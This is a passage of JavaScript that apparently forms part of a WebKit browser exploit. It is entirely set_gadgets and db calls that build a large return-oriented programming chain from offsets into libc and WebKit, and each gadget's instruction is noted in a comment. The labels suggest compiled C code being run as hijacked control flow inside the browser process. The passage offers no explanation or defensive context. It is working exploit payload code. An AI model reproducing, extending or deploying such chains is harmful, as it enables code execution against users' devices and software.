webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11854:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+541896, //L11853
//L11744:
libc_base+764760, //pop rsi
ropchain+537872, //L11856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11856:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11858:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+537992, //L11861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+537976, //L11859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11859:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11861:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+538168, //L11864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+538184, //L11865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+538136, //L11862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+538152, //L11863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11862:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11863:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11864:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11865:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+538280, //L11867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+538264, //L11866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11867:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+538360, //L11868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11868:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11870:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+538480, //L11873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+538464, //L11871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11871:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11873:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+538656, //L11876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+538672, //L11877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+538624, //L11874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+538640, //L11875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11874:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11875:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11876:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11877:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+538768, //L11879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+538752, //L11878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11878:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11879:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+538848, //L11880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11880:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11882:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+538968, //L11885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+538952, //L11883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11883:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11885:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+539144, //L11888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+539160, //L11889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+539112, //L11886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+539128, //L11887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11886:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11887:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11888:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11889:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+539256, //L11891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+539240, //L11890
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11890:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11891:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+539352, //L11893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11892:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11893:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11894:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+539472, //L11896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+539456, //L11895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11895:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11896:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11897:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11898:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+539640, //L11899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11899:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11901:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+539760, //L11904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+539744, //L11902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11902:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11904:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+539920, //L11908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+539872, //L11905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+539888, //L11906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11905:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11906:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11907:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L11908:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+539976, //L11909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11909:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11911:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+540096, //L11912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+540112, //L11914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11912:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11914:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+540256, //L11917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+540224, //L11915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+540240, //L11916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11915:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11916:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11917:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+540336, //L11918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11918:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11920:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+540456, //L11923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+540440, //L11921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11921:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11923:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+540600, //L11926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+540568, //L11924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+540584, //L11925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11924:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11925:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11926:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+540680, //L11927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11929:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+540800, //L11932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+540784, //L11930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11930:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11932:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+540944, //L11935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+540912, //L11933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+540928, //L11934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11933:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11934:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11935:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+541024, //L11936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11936:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11938:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+541144, //L11941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+541128, //L11939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11939:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11941:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+541288, //L11944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+541256, //L11942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+541272, //L11943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11942:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11943:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11944:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+541368, //L11945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11945:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11947:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+541488, //L11950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+541472, //L11948
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11948:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11950:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+541632, //L11953
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+541600, //L11951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+541616, //L11952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11951:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11952:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11953:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L11955:
ropchain+541736, //L11954
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+275424, //__ntoa_long
//L11954:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+541808, //L11956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11956:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11958:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+541888, //L11959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11959:
db([0, 0]); // 0x0
//L11853:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+541936, //L11961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11961:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11963:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+542056, //L11966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+542040, //L11964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11964:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11966:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+542200, //L11969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+542168, //L11967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+542184, //L11968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11967:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11969:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+542288, //L11971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11970:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11971:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+542344, //L11972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11972:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11974:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+542424, //L11976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11976:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+548864, //L10599
//L8576:
libc_base+764760, //pop rsi
ropchain+542520, //L11977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11977:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11979:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+542640, //L11982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+542624, //L11980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11980:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11982:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+542784, //L11985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+542752, //L11983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+542768, //L11984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11983:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11984:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11985:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+542864, //L11986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11986:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11988:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+542984, //L11991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+542968, //L11989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11989:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11991:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+543128, //L11994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+543096, //L11992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+543112, //L11993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11992:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11993:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11994:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+543216, //L11996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11995:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11996:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+543272, //L11997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11997:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11999:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+543352, //L12001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12001:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+543464, //L12002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12002:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12004:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+543584, //L12007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+543568, //L12005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12005:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12007:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+543728, //L12010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+543696, //L12008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+543712, //L12009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12008:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12009:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12010:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
